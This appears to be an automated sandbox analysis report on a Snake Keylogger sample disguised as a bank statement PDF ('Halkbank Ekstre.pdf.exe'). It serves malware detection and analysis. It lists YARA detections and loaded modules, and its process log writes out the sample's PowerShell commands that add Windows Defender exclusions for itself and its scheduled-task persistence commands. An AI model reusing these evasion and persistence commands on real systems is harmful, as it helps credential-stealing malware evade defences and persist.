Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BCD09	10_2_059BCD09
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B6D31	10_2_059B6D31
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BAC30	10_2_059BAC30
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BAC20	10_2_059BAC20
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BBC40	10_2_059BBC40
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BAE98	10_2_059BAE98
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BAEA8	10_2_059BAEA8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BDBA0	10_2_059BDBA0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B5A98	10_2_059B5A98
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B7AE8	10_2_059B7AE8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BAA10	10_2_059BAA10
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059BAA00	10_2_059BAA00
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_076A4E28	10_2_076A4E28
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_076A4E18	10_2_076A4E18
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_076A6908	10_2_076A6908
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_076A71E0	10_2_076A71E0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_076A49F0	10_2_076A49F0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_076AC880	10_2_076AC880
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DC147	17_2_017DC147
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017D7118	17_2_017D7118
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DA088	17_2_017DA088
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017D5362	17_2_017D5362
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DD278	17_2_017DD278
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DC468	17_2_017DC468
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DC738	17_2_017DC738
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017D69A0	17_2_017D69A0
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DE988	17_2_017DE988
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DCA08	17_2_017DCA08
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DCCD8	17_2_017DCCD8
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DCFAB	17_2_017DCFAB
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DE97B	17_2_017DE97B
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017DF961	17_2_017DF961
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017D29EC	17_2_017D29EC
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017D3B85	17_2_017D3B85
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017D3AA1	17_2_017D3AA1
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017D3E09	17_2_017D3E09

Source: Halkbank Ekstre.pdf.exe	Binary or memory string: OriginalFilename vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000000.1343538876.0000000000268000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesrmB.exe@ vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1436870943.000000000AEE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1435409726.00000000085D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1435409726.00000000085D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1422411265.000000000075E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1424810584.0000000002A67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1426911260.00000000037F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000000.00000002.1434818740.0000000006A70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2597991445.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2600586919.00000000011E7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Halkbank Ekstre.pdf.exe
Source: Halkbank Ekstre.pdf.exe	Binary or memory string: OriginalFilenamesrmB.exe@ vs Halkbank Ekstre.pdf.exe

Source: Halkbank Ekstre.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Halkbank Ekstre.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.2597991445.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1426911260.0000000004063000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 1956, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Halkbank Ekstre.pdf.exe PID: 2192, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Halkbank Ekstre.pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: uAHDaCgpWpsogA.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Halkbank Ekstre.pdf.exe.43a8e98.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, fskFMTQvUvBKdNLjaa.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, fskFMTQvUvBKdNLjaa.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, fskFMTQvUvBKdNLjaa.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, fskFMTQvUvBKdNLjaa.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@4/4

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

File created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9D32.tmp

Jump to behavior

Source: Halkbank Ekstre.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Halkbank Ekstre.pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Halkbank Ekstre.pdf.exe, 00000009.00000002.2615770776.0000000003624000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Halkbank Ekstre.pdf.exe	Virustotal: Detection: 38%
Source: Halkbank Ekstre.pdf.exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

File read: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmp9D32.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Process created: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe "C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uAHDaCgpWpsogA" /XML "C:\Users\user\AppData\Local\Temp\tmpC694.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Process created: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe "C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
